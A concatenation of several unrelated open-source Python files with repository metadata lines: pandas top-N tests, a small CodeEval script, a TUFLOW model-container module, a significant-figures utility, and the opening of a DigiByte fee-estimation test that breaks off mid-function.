bn_res = topper.bn_topn(arr, 10)
assert bn_res[0] == max(arr) # sanity check
pd_res = s.order(ascending=False)[:10].dropna()
tm.assert_almost_equal(bn_res, pd_res.values)
# bottom
bn_res = topper.bn_topn(arr, -10)
assert bn_res[0] == min(arr) # sanity check
pd_res = s.order()[:10].dropna() # grab from end since we reversed
tm.assert_almost_equal(bn_res, pd_res.values)
def test_top_smallest(self):
# get the nsmallest
bn_res = topper.bn_topn(arr, -10)
assert bn_res[0] == min(arr) # sanity check
pd_res = s.order()[:10]
tm.assert_almost_equal(bn_res, pd_res.values)
# change ordering
bn_res = topper.bn_topn(arr, -10, ascending=False)
assert bn_res[-1] == min(arr) # sanity check
pd_res = s.order(ascending=False)[-10:] # grab from end since we reversed
tm.assert_almost_equal(bn_res, pd_res.values)
def test_top_arg(self):
# get the nlargest
bn_res = topper.bn_topn(arr, 10)
bn_args = topper.bn_topargn(arr, 10)
arg_res = arr[bn_args]
tm.assert_almost_equal(bn_res, arg_res)
# get the nsmallest
bn_res = topper.bn_topn(arr, -10)
bn_args = topper.bn_topargn(arr, -10)
arg_res = arr[bn_args]
tm.assert_almost_equal(bn_res, arg_res)
# get the nsmallest
bn_res = topper.bn_topn(arr, -10, ascending=False)
bn_args = topper.bn_topargn(arr, -10, ascending=False)
arg_res = arr[bn_args]
tm.assert_almost_equal(bn_res, arg_res)
def test_nans(self):
"""
bottleneck.partsort doesn't handle nans. We need to correct for them.
        The arg version is trickier since we need to make sure to
        translate back into the nan-filled array.
"""
nanarr = np.arange(10).astype(float)
nanarr[nanarr % 2 == 0] = np.nan
test = topper.topn(nanarr, 3)
correct = [9,7,5]
tm.assert_almost_equal(test, correct)
test = topper.topn(nanarr, -3)
correct = [1,3,5]
tm.assert_almost_equal(test, correct)
test = topper.topargn(nanarr, 3)
correct = [9,7,5]
tm.assert_almost_equal(test, correct)
test = topper.topargn(nanarr, -3)
correct = [1,3,5]
tm.assert_almost_equal(test, correct)
test = topper.topargn(nanarr, -3, ascending=False)
correct = [5,3,1]
tm.assert_almost_equal(test, correct)
def test_df_topn(self):
# long way of getting the topn
tops = df.apply(lambda s: s.topn(2, ascending=False), axis=1)
correct = pd.DataFrame(tops, index=df.index)
test = topper.topn_df(df, 2, ascending=False)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order()[-1]
t = test.iloc[0][0]
tm.assert_almost_equal(t, c)
# bottom 2
tops = df.apply(lambda s: s.topn(-2), axis=1)
correct = pd.DataFrame(tops, index=df.index)
test = topper.topn_df(df, -2)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order()[0]
t = test.iloc[0][0]
tm.assert_almost_equal(t, c)
def test_df_topindexn(self):
# long way of getting the topindexn
top_pos = df.apply(lambda s: s.topargn(2, ascending=False), axis=1)
correct = df.columns[top_pos.values]
correct = pd.DataFrame(correct, index=df.index)
test = topper.topindexn_df(df, 2, ascending=False)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order().index[-1]
t = test.iloc[0][0]
tm.assert_almost_equal(t, c)
# bottom 2
top_pos = df.apply(lambda s: s.topargn(-2), axis=1)
correct = df.columns[top_pos.values]
correct = pd.DataFrame(correct, index=df.index)
test = topper.topindexn_df(df, -2)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order().index[0]
t = test.iloc[0][0]
tm.assert_frame_equal(test, correct)
def test_df_topargn(self):
# really this is tested via topindexn indirectly
pass
def test_default_ascending(self):
"""
        Changed the default ascending behaviour to depend on the sign of N.
        This is more intuitive: by default you'd expect the greatest or lowest
        value to come first, depending on which end you are asking for.
"""
# top should default to asc=False
bn_res = topper.bn_topn(arr, 10)
pd_res = s.order(ascending=False)[:10]
tm.assert_almost_equal(bn_res, pd_res.values)
# make sure ascending is still respected
bn_res = topper.bn_topn(arr, 10, ascending=True)
pd_res = s.order(ascending=True)[-10:]
tm.assert_almost_equal(bn_res, pd_res.values)
# bottom defaults asc=True
bn_res = topper.bn_topn(arr, -10)
pd_res = s.order()[:10]
tm.assert_almost_equal(bn_res, pd_res.values)
# make sure ascending is still respected
bn_res = topper.bn_topn(arr, -10, ascending=False)
pd_res = s.order()[:10][::-1]
tm.assert_almost_equal(bn_res, pd_res.values)
def test_test_ndim(self):
"""
Make sure topn and topargn doesn't accept DataFrame
"""
try:
topper.topn(df, 1)
except:
pass
else:
assert False
try:
topper.topargn(df, 1)
except:
pass
else:
assert False
def test_too_big_n_df(self):
df = pd.DataFrame(np.random.randn(100, 10))
df[df > 0] = np.nan
testdf = topper.topn_df(df, 10)
for x in range(len(df)):
correct = df.iloc[x].order(ascending=False).reset_index(drop=True)
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
testdf = topper.topn_df(df, 2)
for x in range(len(df)):
correct = df.iloc[x].order(ascending=False).reset_index(drop=True)[:2]
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
# bottom
testdf = topper.topn_df(df, -2)
for x in range(len(df)):
correct = df.iloc[x].order().reset_index(drop=True)[:2]
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
# bottom
testdf = topper.topn_df(df, -20)
for x in range(len(df)):
correct = df.iloc[x].order().reset_index(drop=True)[:20]
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__,'-vvs','-x','--pdb', '--pdb-failure'],exit=False)
| dalejung/trtools | trtools/core/tests/test_topper.py | Python | mit | 8,499 |
import sys
def main():
with open(sys.argv[1]) as input_file:
for line in input_file.readlines():
input_list = list(reversed(line.strip().split(' ')))
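            # the trailing token M is now first; the next three lines pull it
            # off and print the Mth element from the end of the line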
index = int(input_list[0])
del input_list[0]
print(input_list[index - 1])
if __name__ == '__main__':
main()
| leaen/Codeeval-solutions | mth-to-last-element.py | Python | mit | 325 |
"""
Summary:
Container and main interface for accessing the Tuflow model and a class
for containing the main tuflow model files (Tcf, Tgc, etc).
There are several other classes in here that are used to determine the
order of the files in the model and key words for reading in the files.
Author:
Duncan Runnacles
Created:
01 Apr 2016
Copyright:
Duncan Runnacles 2016
TODO:
Updates:
"""
from __future__ import unicode_literals
from itertools import chain
from ship.tuflow.tuflowfilepart import TuflowFile, TuflowKeyValue, TuflowUserVariable, TuflowModelVariable
from ship.tuflow import FILEPART_TYPES as fpt
from ship.utils import utilfunctions as uf
import logging
logger = logging.getLogger(__name__)
"""logging references with a __name__ set to this module."""
class TuflowModel(object):
"""Container for the entire loaded tuflow model.
"""
def __init__(self, root):
"""Initialise constants and dictionaries.
"""
self.control_files = {}
"""Tuflow Control File objects.
All types of Tuflow Control file are stored here under the type header.
Types are: TCF, TGC, TBC, ECF, TEF.
TCF is slightly different to the others as it contains an additional
member variable 'main_file_hash' to identify the main tcf file that
was called to load the model.
"""
self._root = ''
"""The current directory path used to reach the run files in the model"""
self.missing_model_files = []
"""Contains any tcf, tgs, etc files that could not be loaded."""
self.bc_event = {}
"""Contains the currently acitve BC Event variables."""
self.user_variables = None
"""Class containing the scenario/event/variable keys and values."""
@property
def root(self):
return self._root
@root.setter
def root(self, value):
self._root = value
self.updateRoot(value)
def checkPathsExist(self):
"""Test that all of the filepaths in the TuflowModel exist."""
failed = []
for file_type, file in self.control_files.items():
failed.extend(file.checkPathsExist())
return failed
def updateRoot(self, root):
"""Update the root variable in all TuflowFile's in the model.
The root variable (TuflowModel.root) is the directory that the main
.tcf file is in. This is used to define the location of all other files
which are usually referenced relative to each other.
Note:
This method will be called automatically when setting the
TuflowModel.root variable.
Args:
root(str): the new root to set.
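        Example:
            A minimal sketch; 'tuflow' is assumed to be an already loaded
            TuflowModel instance::
                # assigning the property calls updateRoot() for you
                tuflow.root = "C:/path/to/new/run/folder"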
"""
for c in self.control_files.values():
c.updateRoot(root)
def customPartSearch(self, control_callback, tuflow_callback=None,
include_unknown=False):
"""Return TuflowPart's based on the return value of the callbacks.
control_callback will be used as an argument in each of
self.control_files' customPartSearch() methods. The tuflow_callback
will be called on the combined generators returned from that method.
See Also:
ControlFile.customPartSearch
Continuing the example in the ControlFile.customPartSearch method. This
        time the additional tuflow_callback function is defined as well.
callback_func must accept a TuflowPart and return a tuple of:
keep-status and the return value. For example::
# This is the callback_func that we test the TuflowPart. It is
# defined in your script
def callback_func(part):
# In this case we check for GIS parts and return a tuple of:
# - bool(keep-status): True if it is a GIS filepart_type
# - tuple: filename and parent.model_type. This can be
# whatever you want though
if part.filepart_type == fpt.GIS:
return True, (part.filename, part.associates.parent.model_type)
# Any TuflowPart's that you don't want included must return
# a tuple of (False, None)
else:
return False, None
# Here we define a function to run after the generators are returned
# from callback_func. In the funcion above the return type is a
# tuple, so we accept that as the arg in this function, but it will
# be whatever you return from callback_func above.
            # This function checks to see if there are any duplicate filenames.
# Note that it must return the same tuple as the other callback.
# i.e. keep-status, result
            found = []
            def tuflow_callback(part_tuple):
                if part_tuple[0] in found:
                    return False, None
                else:
                    found.append(part_tuple[0])
                    return True, part_tuple[0]
            # Both callbacks are given this time
            results = tuflow.customPartSearch(callback_func,
                                              tuflow_callback=tuflow_callback)
            # You can now iterate the results
for r in results:
print (str(r))
Args:
callback_func(func): a function to run for each TuflowPart in
this ControlFile's PartHolder.
include_unknown=False(bool): If False any UnknownPart's will be
ignored. If set to True it is the resonsibility of the
callback_func to check for this and deal with it.
Return:
generator - containing the results of the search.
"""
gens = []
for c in self.control_files.values():
gens.append(
c.customPartSearch(control_callback, include_unknown)
)
        all_gens = chain(gens)
for a in all_gens:
for val in a:
if tuflow_callback:
take, value = tuflow_callback(val)
if take:
yield[value]
else:
yield [val]
def removeTcfModelFile(self, model_file):
"""Remove an existing ModelFile from 'TCF' and update ControlFile.
Note:
You can call this function directly if you want to, but it is also
hooked into a callback in the TCF ControlFile. This means that when
you use the standard ControlFile add/remove/replaceControlFile()
methods these will be called automatically.
Args:
            model_file(ModelFile): the ModelFile being removed.
"""
        if model_file not in self.control_files[model_file.model_type].control_files:
            raise AttributeError("model_file doesn't exist in %s control_files" % model_file.model_type)
self.control_files[model_file.model_type].removeControlFile(model_file)
self.control_files['TCF'].parts.remove(model_file)
def replaceTcfModelFile(self, model_file, control_file, replace_file):
"""Replace an existing ModelFile in 'TCF' and update ControlFile.
Note:
You can call this function directly if you want to, but it is also
hooked into a callback in the TCF ControlFile. This means that when
you use the standard ControlFile add/remove/replaceControlFile()
methods these will be called automatically.
Args:
model_file(ModelFile): the replacement TuflowPart.
control_file(ControlFile): containing the contents to replace the
existing ControlFile.
replace_file(ModelFile): the TuflowPart to be replaced.
"""
if model_file in self.control_files[model_file.model_type].control_files:
raise AttributeError('model_file already exists in this ControlFile')
self.control_files[replace_file.model_type].replaceControlFile(
model_file, control_file, replace_file)
self.control_files['TCF'].parts.replace(model_file, replace_file)
def addTcfModelFile(self, model_file, control_file, **kwargs):
"""Add a new ModelFile instance to a TCF type ControlFile.
Note:
You can call this function directly if you want to, but it is also
hooked into a callback in the TCF ControlFile. This means that when
you use the standard ControlFile add/remove/replaceControlFile()
methods these will be called automatically.
**kwargs:
after(TuflowPart): the part to add the new ModelFile after.
before(TuflowPart): the part to add the new ModelFile before.
Either after or before kwargs must be given. If both are provided after
will take precedence.
Args:
            model_file(ModelFile): the new ModelFile TuflowPart to add.
            control_file(ControlFile): the ControlFile holding the loaded
                contents of model_file.
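        Example:
            A minimal sketch; 'new_model_file', 'new_control' and 'tcf_part'
            are assumed to be a ModelFile, a ControlFile and an existing
            TuflowPart built or loaded elsewhere::
                tuflow.addTcfModelFile(new_model_file, new_control,
                                       after=tcf_part)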
"""
if not 'after' in kwargs.keys() and not 'before' in kwargs.keys():
raise AttributeError("Either 'before' or 'after' TuflowPart kwarg must be given")
if model_file in self.control_files[model_file.model_type].control_files:
raise AttributeError('model_file already exists in this ControlFile')
self.control_files[model_file.model_type].addControlFile(
model_file, control_file, **kwargs)
self.control_files['TCF'].parts.add(model_file, **kwargs)
# class TuflowUtils(object):
# """Utility functions for dealing with TuflowModel outputs."""
#
# def __init__(self):
# pass
#
# @staticmethod
# def resultsByParent(results):
# """
# """
class UserVariables(object):
"""Container for all user defined variables.
    Includes variables set in the control files with 'Set somevar ==' and the
    scenario and event variables.
Note:
Only the currently active scenario and event variables will be stored
in this class.
"""
def __init__(self):
self.variable = {}
self.scenario = {}
self.event = {}
self._names = []
self.has_cmd_args = False
def add(self, filepart, vtype=None):
"""Add a new variables to the class.
Args:
filepart(TuflowModelVariables or TuflowUserVariable):
Raises:
TypeError - if filepart is not a TuflowModelVariable or TuflowUserVariable.
ValueError - if filepart already exists.
"""
if filepart._variable_name in self._names:
raise ValueError('variable already exists with that name - use replace instead')
if isinstance(filepart, TuflowUserVariable):
self.variable[filepart.variable_name] = filepart
self._names.append(filepart.variable_name)
elif isinstance(filepart, TuflowModelVariable):
if filepart._variable_type == 'scenario':
if filepart._variable_name == 's1' or filepart._variable_name == 's':
if 's' in self._names or 's1' in self._names:
raise ValueError("variable already exists with that " +
"name - use replace instead\n" +
"note 's' and 's1' are treated the same.")
self.scenario[filepart._variable_name] = filepart
self.variable[filepart._variable_name] = filepart
self._names.append(filepart.variable_name)
else:
if filepart._variable_name == 'e1' or filepart._variable_name == 'e':
if 'e' in self._names or 'e1' in self._names:
raise ValueError("variable already exists with that " +
"name - use replace instead\n" +
"note 'e' and 'e1' are treated the same.")
self.event[filepart._variable_name] = filepart
self.variable[filepart._variable_name] = filepart
self._names.append(filepart.variable_name)
else:
raise TypeError('filepart must be of type TuflowUserVariable or TuflowModelVariable')
def replace(self, filepart):
"""Replace an existing variable.
Args:
filepart(TuflowModelVariables or TuflowUserVariable):
Raises:
TypeError - if filepart is not a TuflowModelVariable or TuflowUserVariable.
ValueError - if filepart doesn't already exist.
"""
# Make sure it actually already exists.
# s & s1 and e & e1 are treated as the same name - same as tuflow
temp_name = filepart._variable_name
if temp_name == 's' or temp_name == 's1':
if not 's' in self._names and not 's1' in self._names:
raise ValueError("filepart doesn't seem to exist in UserVariables.")
elif temp_name == 'e' or temp_name == 'e1':
if not 'e' in self._names and not 'e1' in self._names:
raise ValueError("filepart doesn't seem to exist in UserVariables.")
elif not filepart._variable_name in self._names:
raise ValueError("filepart doesn't seem to exist in UserVariables.")
# Delete the old one and call add() with the new one
        if temp_name == 's' or temp_name == 's1':
            if 's' in self.scenario.keys():
                del self.scenario['s']
                del self.variable['s']
            if 's1' in self.scenario.keys():
                del self.scenario['s1']
                del self.variable['s1']
            self.add(filepart, 'scenario')
        elif temp_name == 'e' or temp_name == 'e1':
            if 'e' in self.event.keys():
                del self.event['e']
                del self.variable['e']
            if 'e1' in self.event.keys():
                del self.event['e1']
                del self.variable['e1']
            self.add(filepart, 'event')
else:
del self.variable[temp_name]
self.add(filepart)
def variablesToDict(self):
"""Get the values of the variables.
        Note that, like tuflow, scenario and event values will be included in
        the variables dict returned.
        {'name1': var1, 'name2': var2, 'nameN': varN}
Return:
dict - with variables names as key and values as values.
"""
out = {}
for vkey, vval in self.variable.items():
out[vkey] = vval.variable
return out
def seValsToDict(self):
"""Get the values of the scenario and event variables.
Returns the currently active scenario and event values only - not the
placeholder keys - in a dictionary in the format::
{'scenario': [val1, val2, valN], 'event': [val1, val2, valN]}
Return:
dict - of scenario and event values.
"""
scenario = [s.variable for s in self.scenario.values()]
event = [e.variable for e in self.event.values()]
return {'scenario': scenario, 'event': event}
def remove(self, key):
"""Remove the variable stored at the given key.
Args:
key(str): key for either the scenario, event, or variables dict.
"""
if key in self.scenario.keys():
self._names.remove(self.scenario[key]._variable_name)
del self.scenario[key]
        if key in self.event.keys():
            self._names.remove(self.event[key]._variable_name)
            del self.event[key]
        if key in self.variable.keys():
            name = self.variable[key]._variable_name
            if name in self._names:
                self._names.remove(name)
            del self.variable[key]
def get(self, key, vtype=None):
"""Return the TuflowPart at the given key.
Args:
key(str): the key associated with the required TuflowPart.
vtype=None(str): the type of part to return. If None it will return
a 'variable' type. Other options are 'scenario' and 'event'.
Return:
TuflowPart - TuflowModelVariable or TuflowUserVariable type.
"""
if vtype == 'scenario':
if not key in self.scenario.keys():
raise KeyError('key %s is not in scenario keys' % key)
return self.scenario[key]
elif vtype == 'event':
if not key in self.event.keys():
raise KeyError('key %s is not in event keys' % key)
return self.event[key]
else:
if not key in self.variable.keys():
raise KeyError('key %s is not in variable keys' % key)
return self.variable[key]
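# Illustrative check only (not part of the original module): with nothing added
# yet, the dict views defined above are empty and get() raises KeyError.
# Populating the container needs TuflowUserVariable/TuflowModelVariable
# instances created elsewhere in the library, so none are constructed here.
def _empty_user_variables_example():
    uv = UserVariables()
    assert uv.variablesToDict() == {}
    assert uv.seValsToDict() == {'scenario': [], 'event': []}
    try:
        uv.get('s1', vtype='scenario')
    except KeyError:
        pass  # no scenario variables have been added yet
    return uv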
class TuflowFilepartTypes(object):
"""Contains key words from Tuflow files for lookup.
This acts as a lookup table for the TuflowLoader class more than anything
else. It is kept here as that seems to be most sensible.
Contains methods for identifying whether a command given to it is known
to the library and what type it is. i.e. what UNIT_CATEGORY it falls into.
"""
def __init__(self):
"""Initialise the categories and known keywords"""
self.ambiguous = {
'WRITE CHECK FILES': [
['WRITE CHECK FILES INCLUDE', fpt.VARIABLE],
['WRITE CHECK FILES EXCLUDE', fpt.VARIABLE]
],
# 'WRITE CHECK FILES INCLUDE': ['WRITE CHECK FILES', fpt.RESULT],
# 'WRITE CHECK FILES EXCLUDE': ['WRITE CHECK FILES', fpt.RESULT],
'DEFINE EVENT': [['DEFINE OUTPUT ZONE', fpt.SECTION_LOGIC]],
'DEFINE OUTPUT ZONE': [['DEFINE EVENT', fpt.EVENT_LOGIC]],
# 'START 1D DOMAIN': ['START 2D DOMAIN', fpt.SECTION_LOGIC],
# 'START 2D DOMAIN': ['START 1D DOMAIN', fpt.SECTION_LOGIC],
}
self.ambiguous_keys = self.ambiguous.keys()
self.types = {}
self.types[fpt.MODEL] = [
'GEOMETRY CONTROL FILE', 'BC CONTROL FILE',
'READ GEOMETRY CONTROL FILE', 'READ BC CONTROL FILE',
'READ FILE', 'ESTRY CONTROL FILE',
'EVENT FILE'
]
self.types[fpt.RESULT] = [
'OUTPUT FOLDER', 'WRITE CHECK FILES', 'LOG FOLDER'
]
self.types[fpt.GIS] = [
'READ MI', 'READ GIS', 'READ GRID', 'SHP PROJECTION',
'MI PROJECTION'
]
self.types[fpt.DATA] = ['READ MATERIALS FILE', 'BC DATABASE']
self.types[fpt.VARIABLE] = [
'START TIME', 'END TIME', 'TIMESTEP', 'SET IWL',
'MAP OUTPUT INTERVAL', 'MAP OUTPUT DATA TYPES', 'CELL WET/DRY DEPTH',
'CELL SIDE WET/DRY DEPTH', 'SET IWL', 'TIME SERIES OUTPUT INTERVAL',
'SCREEN/LOG DISPLAY INTERVAL', 'CSV TIME', 'START OUTPUT',
'OUTPUT INTERVAL', 'STRUCTURE LOSSES', 'WLL APPROACH',
'WLL ADJUST XS WIDTH', 'WLL ADDITIONAL POINTS',
'DEPTH LIMIT FACTOR', 'CELL SIZE', 'SET CODE', 'GRID SIZE (X,Y)',
'SET ZPTS', 'SET MAT', 'MASS BALANCE OUTPUT', 'GIS FORMAT',
'MAP OUTPUT FORMATS', 'END MAT OUTPUT', 'ASC START MAP OUTPUT',
'ASC END MAP OUTPUT', 'XMDF MAP OUTPUT DATA TYPES',
'WRITE PO ONLINE', 'ASC MAP OUTPUT DATA TYPES',
'WRITE CHECK FILES INCLUDE', 'WRITE CHECK FILES EXCLUDE',
'STORE MAXIMUMS AND MINIMUMS'
]
self.types[fpt.IF_LOGIC] = [
'IF SCENARIO', 'ELSE IF SCENARIO', 'IF EVENT',
'ELSE IF EVENT', 'END IF', 'ELSE'
]
self.types[fpt.EVENT_LOGIC] = ['DEFINE EVENT', 'END DEFINE']
self.types[fpt.SECTION_LOGIC] = ['DEFINE OUTPUT ZONE', 'END DEFINE']
self.types[fpt.DOMAIN_LOGIC] = [
'START 1D DOMAIN', 'END 1D DOMAIN', 'START 2D DOMAIN',
'END 2D DOMAIN'
]
self.types[fpt.USER_VARIABLE] = ['SET VARIABLE']
self.types[fpt.EVENT_VARIABLE] = [
'BC EVENT TEXT', 'BC EVENT NAME',
'BC EVENT SOURCE',
]
self.types[fpt.MODEL_VARIABLE] = ['MODEL SCENARIOS', 'MODEL EVENTS', ]
def find(self, find_val, file_type='*'):
"""Checks if the given value is known or not.
        The keyword to look for doesn't have to be an exact match to the given
        value; the given value only has to start with it. This means that we
        don't need to know whether it is a 'command == something' or just
        'command something' (like: 'Estry Control File Auto') at this point.
        This helps to avoid unnecessary repetition. i.e. many files are like:
        'READ GIS' + another word. All of them are GIS type files so they all
        get dealt with in the same way.
        In some edge cases there are commands that start the same. These are
        dealt with by a secondary check to see if the next character is '=' or
        not.
        Args:
            find_val (str): the value to attempt to find in the lookup table.
            file_type (int): Optional - reduce the lookup time by providing
                the type (category) to look for the value in. These are the
                constants (MODEL, GIS, etc).
Returns:
Tuple (Bool, int) True if found. Int is the class constant
indicating what type the value was found under.
"""
find_val = find_val.upper()
if file_type == '*':
for key, part_type in self.types.items():
found = [i for i in part_type if find_val.startswith(i)]
if found:
retval = key
if found[0] in self.ambiguous_keys:
retval = self._checkAmbiguity(found[0], find_val, key)
return True, retval
return (False, None)
else:
found = [i for i in self.types[file_type] if find_val.startswith(i)]
if found:
return True, file_type
return (False, None)
def _checkAmbiguity(self, found, find_val, key):
"""Resolves any ambiguity in the keys."""
f = find_val.replace(' ', '')
f2 = found.replace(' ', '') + '='
if f.startswith(f2):
return key
else:
alternatives = self.ambiguous[found]
for i, a in enumerate(alternatives):
if find_val.startswith(a[0]):
return self.ambiguous[found][i][1]
return key
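# Minimal usage sketch (not part of the original module). It relies on the fpt
# constants imported earlier in this file; the command strings are made-up
# examples of the prefix matching described in find(): 'READ GIS Z Shape' only
# needs to start with the known keyword 'READ GIS' to be classed as a GIS part.
def _filepart_types_example():
    lookup = TuflowFilepartTypes()
    found, part_type = lookup.find('READ GIS Z Shape')
    assert found and part_type == fpt.GIS
    found, part_type = lookup.find('SOME UNKNOWN COMMAND')
    assert not found and part_type is None
    # Restricting the search to one category skips the '*' lookup loop.
    found, part_type = lookup.find('READ MATERIALS FILE', file_type=fpt.DATA)
    assert found and part_type == fpt.DATA
    return lookup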
| duncan-r/SHIP | ship/tuflow/tuflowmodel.py | Python | mit | 22,689 |
from math import floor, log10
def round_(x, n):
"""Round a float, x, to n significant figures.
Caution should be applied when performing this operation.
Significant figures are an implication of precision; arbitrarily
truncating floats mid-calculation is probably not Good Practice in
almost all cases.
Rounding off a float to n s.f. results in a float. Floats are, in
general, approximations of decimal numbers. The point here is that
it is very possible to end up with an inexact number:
    >>> round_(0.0012395, 3)
    0.00124
    >>> round_(0.0012315, 3)
0.0012300000000000002
Basically, rounding in this way probably doesn't do what you want
it to.
"""
n = int(n)
x = float(x)
if x == 0: return 0
e = floor(log10(abs(x)) - n + 1) # exponent, 10 ** e
shifted_dp = x / (10 ** e) # decimal place shifted n d.p.
return round(shifted_dp) * (10 ** e) # round and revert
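# Worked example of the arithmetic above (illustrative only, not part of the
# original module): for round_(0.0012395, 3) the exponent comes out as
# floor(log10(0.0012395) - 3 + 1) = -5, so the value is shifted to ~123.95,
# rounded to 124 and scaled back down, giving ~0.00124 subject to the float
# representation caveat described in the docstring.
def _round_example():
    x, n = 0.0012395, 3
    e = floor(log10(abs(x)) - n + 1)      # -5, i.e. shift by 10 ** -5
    assert e == -5
    assert round(x / (10 ** e)) == 124    # 123.95 -> 124
    assert abs(round_(x, n) - 0.00124) < 1e-12
    return round_(x, n)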
def string(x, n):
"""Convert a float, x, to a string with n significant figures.
This function returns a decimal string representation of a float
to a specified number of significant figures.
    >>> string(9.80665, 3)
    '9.81'
    >>> string(0.0120076, 3)
    '0.0120'
    >>> string(100000, 5)
'100000'
Note the last representation is, without context, ambiguous. This
is a good reason to use scientific notation, but it's not always
appropriate.
Note
----
Performing this operation as a set of string operations arguably
makes more sense than a mathematical operation conceptually. It's
the presentation of the number that is being changed here, not the
number itself (which is in turn only approximated by a float).
"""
n = int(n)
x = float(x)
if n < 1: raise ValueError("1+ significant digits required.")
# retrieve the significand and exponent from the S.N. form
s, e = ''.join(( '{:.', str(n - 1), 'e}')).format(x).split('e')
e = int(e) # might as well coerce now
if e == 0:
# Significand requires no adjustment
return s
s = s.replace('.', '')
if e < 0:
# Placeholder zeros need creating
return ''.join(('0.', '0' * (abs(e) - 1), s))
else:
        # Decimal place needs shifting
s += '0' * (e - n + 1) # s now has correct s.f.
i = e + 1
sep = ''
if i < n: sep = '.'
        if s[0] == '-': i += 1  # don't count the leading sign as a digit position
return sep.join((s[:i], s[i:]))
def scientific(x, n):
"""Represent a float in scientific notation.
This function is merely a wrapper around the 'e' type flag in the
formatting specification.
"""
n = int(n)
x = float(x)
if n < 1: raise ValueError("1+ significant digits required.")
return ''.join(('{:.', str(n - 1), 'e}')).format(x)
def general(x, n):
"""Represent a float in general form.
This function is merely a wrapper around the 'g' type flag in the
formatting specification.
"""
n = int(n)
x = float(x)
if n < 1: raise ValueError("1+ significant digits required.")
return ''.join(('{:#.', str(n), 'g}')).format(x)
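# Side-by-side sketch (not part of the original module) of the three string
# helpers, using the ambiguous '100000' case from string()'s docstring: the
# plain decimal form hides how many trailing zeros are significant, while the
# exponent forms make the 5 significant figures explicit.
def _format_comparison_example():
    assert string(100000, 5) == '100000'
    assert scientific(100000, 5) == '1.0000e+05'
    # general() also falls back to the exponent form here because the
    # exponent (5) is not smaller than the requested precision (5).
    assert general(100000, 5) == '1.0000e+05'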
| corriander/python-sigfig | sigfig/sigfig.py | Python | mit | 2,902 |
#!/usr/bin/env python3
# Copyright (c) 2009-2019 The Bitcoin Core developers
# Copyright (c) 2014-2019 The DigiByte Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test fee estimation code."""
from decimal import Decimal
import random
from test_framework.messages import CTransaction, CTxIn, CTxOut, COutPoint, ToHex, COIN
from test_framework.script import CScript, OP_1, OP_DROP, OP_2, OP_HASH160, OP_EQUAL, hash160, OP_TRUE
from test_framework.test_framework import DigiByteTestFramework
from test_framework.util import (
assert_equal,
assert_greater_than,
assert_greater_than_or_equal,
connect_nodes,
satoshi_round,
sync_blocks,
sync_mempools,
)
# Construct 2 trivial P2SH's and the ScriptSigs that spend them
# So we can create many transactions without needing to spend
# time signing.
REDEEM_SCRIPT_1 = CScript([OP_1, OP_DROP])
REDEEM_SCRIPT_2 = CScript([OP_2, OP_DROP])
P2SH_1 = CScript([OP_HASH160, hash160(REDEEM_SCRIPT_1), OP_EQUAL])
P2SH_2 = CScript([OP_HASH160, hash160(REDEEM_SCRIPT_2), OP_EQUAL])
# Associated ScriptSigs that satisfy P2SH_1 and P2SH_2
SCRIPT_SIG = [CScript([OP_TRUE, REDEEM_SCRIPT_1]), CScript([OP_TRUE, REDEEM_SCRIPT_2])]
def small_txpuzzle_randfee(from_node, conflist, unconflist, amount, min_fee, fee_increment):
"""Create and send a transaction with a random fee.
The transaction pays to a trivial P2SH script, and assumes that its inputs
are of the same form.
The function takes a list of confirmed outputs and unconfirmed outputs
and attempts to use the confirmed list first for its inputs.
It adds the newly created outputs to the unconfirmed list.
Returns (raw transaction, fee)."""
# It's best to exponentially distribute our random fees
# because the buckets are exponentially spaced.
# Exponentially distributed from 1-128 * fee_increment
rand_fee = float(fee_increment) * (1.1892 ** random.randint(0, 28))
# Total fee ranges from min_fee to min_fee + 127*fee_increment
fee = min_fee - fee_increment + satoshi_round(rand_fee)
tx = CTransaction()
total_in = Decimal("0.00000000")
while total_in <= (amount + fee) and len(conflist) > 0:
t = conflist.pop(0)
total_in += t["amount"]
tx.vin.append(CTxIn(COutPoint(int(t["txid"], 16), t["vout"]), b""))
if total_in <= amount + fee:
while total_in <= (amount + fee) and len(unconflist) > 0:
t = unconflist.pop(0)
total_in += t["amount"]
tx.vin.append(CTxIn(COutPoint(int(t["txid"], 16), t["vout"]), b""))
if total_in <= amount + fee:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount + fee, total_in))
tx.vout.append(CTxOut(int((total_in - amount - fee) * COIN), P2SH_1))
tx.vout.append(CTxOut(int(amount * COIN), P2SH_2))
# These transactions don't need to be signed, but we still have to insert
# the ScriptSig that will satisfy the ScriptPubKey.
for inp in tx.vin:
inp.scriptSig = SCRIPT_SIG[inp.prevout.n]
txid = from_node.sendrawtransaction(ToHex(tx), True)
unconflist.append({"txid": txid, "vout": 0, "amount": total_in - amount - fee})
unconflist.append({"txid": txid, "vout": 1, "amount": amount})
return (ToHex(tx), fee)
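# Quick illustration (not part of the original test) of the fee spread used in
# small_txpuzzle_randfee(): 1.1892 is roughly 2 ** 0.25, so the random factor
# 1.1892 ** k for k in 0..28 spans about 1x to 2 ** 7 = 128x the fee increment,
# which is where the "1-128 * fee_increment" comment above comes from.
def _fee_spread_example(fee_increment=Decimal("0.00001")):
    lo = float(fee_increment) * (1.1892 ** 0)    # ~1 * fee_increment
    hi = float(fee_increment) * (1.1892 ** 28)   # ~128 * fee_increment
    return lo, hi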
def split_inputs(from_node, txins, txouts, initial_split=False):
"""Generate a lot of inputs so we can generate a ton of transactions.
This function takes an input from txins, and creates and sends a transaction
which splits the value into 2 outputs which are appended to txouts.
Previously this was designed to be small inputs so they wouldn't have
a high coin age when the notion of priority still existed."""
prevtxout = txins.pop()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int(prevtxout["txid"], 16), prevtxout["vout"]), b""))
half_change = satoshi_round(prevtxout["amount"] / 2)
rem_change = prevtxout["amount"] - half_change - Decimal("0.00001000")
